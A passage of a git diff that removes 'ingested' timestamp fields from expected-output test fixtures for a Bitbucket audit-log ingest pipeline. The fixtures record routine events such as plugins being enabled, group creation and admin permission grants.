"{\"timestamp\":\"2021-11-27T17:29:02.796Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.applinks.applinks-oauth-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"8.0.4\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.applinks.applinks-oauth-plugin\"}]}", "type": "info", "kind": "event" 
@@ -9207,7 +9047,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867839477Z", "original": "{\"timestamp\":\"2021-11-27T17:29:02.529Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.oauth.consumer.sal\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"4.3.1\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.oauth.consumer.sal\"}]}", "type": "info", "kind": "event" @@ -9261,7 +9100,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867840369Z", "original": "{\"timestamp\":\"2021-11-27T17:29:02.528Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.applinks.applinks-cors-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"8.0.4\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.applinks.applinks-cors-plugin\"}]}", "type": "info", "kind": "event" 
@@ -9315,7 +9153,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867841269Z", "original": "{\"timestamp\":\"2021-11-27T17:29:02.521Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.applinks.applinks-basicauth-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"8.0.4\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.applinks.applinks-basicauth-plugin\"}]}", "type": "info", "kind": "event" @@ -9369,7 +9206,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867842296Z", "original": "{\"timestamp\":\"2021-11-27T17:29:02.387Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.applinks.applinks-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"8.0.4\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.applinks.applinks-plugin\"}]}", "type": "info", "kind": "event" 
@@ -9423,7 +9259,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867843535Z", "original": "{\"timestamp\":\"2021-11-27T17:29:02.050Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.oauth.atlassian-oauth-service-provider-spi\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"4.3.1\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.oauth.atlassian-oauth-service-provider-spi\"}]}", "type": "info", "kind": "event" 
@@ -9477,7 +9312,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867844431Z", "original": "{\"timestamp\":\"2021-11-27T17:29:02.049Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bundles.json-20070829.0.0.1\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"20070829.0.0.1\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bundles.json-20070829.0.0.1\"}]}", "type": "info", "kind": "event" @@ -9531,7 +9365,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867845343Z", "original": "{\"timestamp\":\"2021-11-27T17:29:02.047Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.oauth.atlassian-oauth-consumer-spi\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"4.3.1\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.oauth.atlassian-oauth-consumer-spi\"}]}", "type": "info", "kind": "event" 
@@ -9585,7 +9418,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867846295Z", "original": "{\"timestamp\":\"2021-11-27T17:29:02.047Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.springsource.org.jdom-1.1.0\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"1.1.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.springsource.org.jdom-1.1.0\"}]}", "type": "info", "kind": "event" @@ -9639,7 +9471,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867847185Z", "original": "{\"timestamp\":\"2021-11-27T17:29:02.046Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.analytics.analytics-whitelist\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"3.84\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.analytics.analytics-whitelist\"}]}", "type": "info", "kind": "event" 
@@ -9693,7 +9524,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867848118Z", "original": "{\"timestamp\":\"2021-11-27T17:29:02.043Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.analytics.analytics-client\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"6.2.1\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.analytics.analytics-client\"}]}", "type": "info", "kind": "event" @@ -9747,7 +9577,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867849161Z", "original": "{\"timestamp\":\"2021-11-27T17:29:00.763Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.plugins.rest.atlassian-rest-module\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"6.0.7\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.plugins.rest.atlassian-rest-module\"}]}", "type": "info", "kind": "event" 
@@ -9801,7 +9630,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867850093Z", "original": "{\"timestamp\":\"2021-11-27T17:29:00.746Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.templaterenderer.atlassian-template-renderer-velocity1.6-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"4.1.4\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.templaterenderer.atlassian-template-renderer-velocity1.6-plugin\"}]}", "type": "info", "kind": "event" 
@@ -9855,7 +9683,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867851123Z", "original": "{\"timestamp\":\"2021-11-27T17:29:00.736Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.activeobjects.activeobjects-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"3.2.11\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.activeobjects.activeobjects-plugin\"}]}", "type": "info", "kind": "event" @@ -9909,7 +9736,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867852081Z", "original": "{\"timestamp\":\"2021-11-27T17:29:00.687Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.templaterenderer.api\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"4.1.4\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.templaterenderer.api\"}]}", "type": "info", "kind": "event" 
@@ -9963,7 +9789,6 @@ }, "event": { "action": "bitbucket.service.applicationconfiguration.audit.action.displaynamechanged", - "ingested": "2021-12-24T00:37:18.867852983Z", "original": "{\"timestamp\":\"2021-11-27T17:26:26.205Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.globaladministration\",\"category\":\"Global administration\",\"actionI18nKey\":\"bitbucket.service.applicationconfiguration.audit.action.displaynamechanged\",\"action\":\"Server name changed\"},\"affectedObjects\":[],\"changedValues\":[{\"key\":\"Name\",\"i18nKey\":\"bitbucket.service.applicationconfiguration.audit.changedvalue.displaynamechanged.name\",\"to\":\"Bitbucket\"}],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"name\":\"details\",\"value\":\"{\\\"new\\\":\\\"Bitbucket\\\",\\\"old\\\":null}\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"DISPLAY_NAME\"}]}", "type": "info", "kind": "event" 
@@ -10018,7 +9843,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.groupcreated", - "ingested": "2021-12-24T00:37:18.867853873Z", "original": "{\"timestamp\":\"2021-11-27T17:26:25.141Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"category\":\"Users and groups\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.groupcreated\",\"action\":\"User group created\"},\"affectedObjects\":[{\"name\":\"stash-users\",\"type\":\"GROUP\",\"uri\":\"http://bitbucket.internal:7990/admin/groups/view?name=stash-users\",\"id\":\"stash-users\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"stash-users\"}]}", "type": [ "group", @@ -10079,7 +9903,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.directorycreated", - "ingested": "2021-12-24T00:37:18.867854768Z", "original": "{\"timestamp\":\"2021-11-27T17:26:25.045Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"category\":\"Users and groups\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.directorycreated\",\"action\":\"User directory created\"},\"affectedObjects\":[],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.directory.name\",\"name\":\"Directory name\",\"value\":\"Bitbucket Internal Directory\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"Bitbucket Internal Directory\"}]}", "type": "info", "kind": "event" 
diff --git a/packages/atlassian_bitbucket/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json b/packages/atlassian_bitbucket/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json index d2bc3605491..e3b59455ae0 100644 --- a/packages/atlassian_bitbucket/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json +++ b/packages/atlassian_bitbucket/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json @@ -68,7 +68,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.groupmembershipscreated.user", - "ingested": "2021-12-24T00:37:41.020767419Z", "original": "{\"affectedObjects\":[{\"id\":\"stash-users\",\"name\":\"stash-users\",\"type\":\"GROUP\"},{\"id\":\"2\",\"name\":\"admin\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"User added to user group\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.groupmembershipscreated.user\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"stash-users\"},{\"name\":\"Parent group\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.groupmembership.parentgroup\",\"value\":\"stash-users\"},{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"entities\\\":[\\\"admin\\\"],\\\"membership\\\":\\\"GROUP_USER\\\"}\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034465,\"nano\":313000000},\"version\":\"1.0\"}", "type": [ "group", 
@@ -157,7 +156,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.globalpermissiongrantrequested", - "ingested": "2021-12-24T00:37:41.020770621Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"admin\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"Global permission requested\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.globalpermissiongrantrequested\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"bitbucket.service.audit.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Permission\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.permission.permission\",\"value\":\"SYS_ADMIN\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"Global\"},{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"permission\\\":\\\"SYS_ADMIN\\\",\\\"user\\\":\\\"admin\\\"}\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034466,\"nano\":19000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -232,7 +230,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.globalpermissiongranted", - "ingested": "2021-12-24T00:37:41.020771462Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"admin\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"Global permission granted\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.globalpermissiongranted\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"bitbucket.service.audit.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Permission\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.permission.permission\",\"value\":\"SYS_ADMIN\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"Global\"},{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"permission\\\":\\\"SYS_ADMIN\\\",\\\"user\\\":\\\"admin\\\"}\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034466,\"nano\":108000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -295,7 +292,6 @@ }, "event": { "action": "bitbucket.service.applicationconfiguration.audit.action.applicationsetup", - "ingested": "2021-12-24T00:37:41.020772222Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Instance setup completed\",\"actionI18nKey\":\"bitbucket.service.applicationconfiguration.audit.action.applicationsetup\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Global administration\",\"categoryI18nKey\":\"bitbucket.service.audit.category.globaladministration\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"SERVER_IS_SETUP\"},{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"new\\\":true,\\\"old\\\":false}\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034466,\"nano\":112000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -326,7 +322,6 @@ }, "event": { "action": "bitbucket.search.audit.action.elasticsearchconfigurationchange", - "ingested": "2021-12-24T00:37:41.020772972Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Elasticsearch settings changed\",\"actionI18nKey\":\"bitbucket.search.audit.action.elasticsearchconfigurationchange\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Global administration\",\"categoryI18nKey\":\"bitbucket.service.audit.category.globaladministration\",\"level\":\"BASE\"},\"author\":{\"id\":\"-1\",\"name\":\"System\",\"type\":\"system\"},\"changedValues\":[{\"i18nKey\":\"bitbucket.search.audit.changedvalue.elasticsearchconfigurationchange.username\",\"key\":\"Username\",\"to\":\"bitbucket\"}],\"extraAttributes\":[{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"changed\\\":\\\",elasticsearchPasswordelasticsearchUsername\\\",\\\"username\\\":\\\"bitbucket\\\"}\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"Elasticsearch\"}],\"method\":\"System\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034511,\"nano\":898000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -430,7 +425,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:37:41.020773701Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log search performed\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Query\",\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"value\":\"\"},{\"name\":\"ID Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"value\":\"55 - 154\"},{\"name\":\"Results returned\",\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"value\":\"100\"},{\"name\":\"Timestamp Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"value\":\"2021-11-27T17:29:11.242Z - 2021-11-27T17:35:11.898Z\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034531,\"nano\":362000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -502,7 +496,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:37:41.020774512Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log search performed\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Query\",\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"value\":\"\"},{\"name\":\"Results returned\",\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"value\":\"54\"},{\"name\":\"Timestamp Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"value\":\"2021-11-27T17:26:25.045Z - 2021-11-27T17:29:11.102Z\"},{\"name\":\"ID Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"value\":\"1 - 54\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034533,\"nano\":93000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
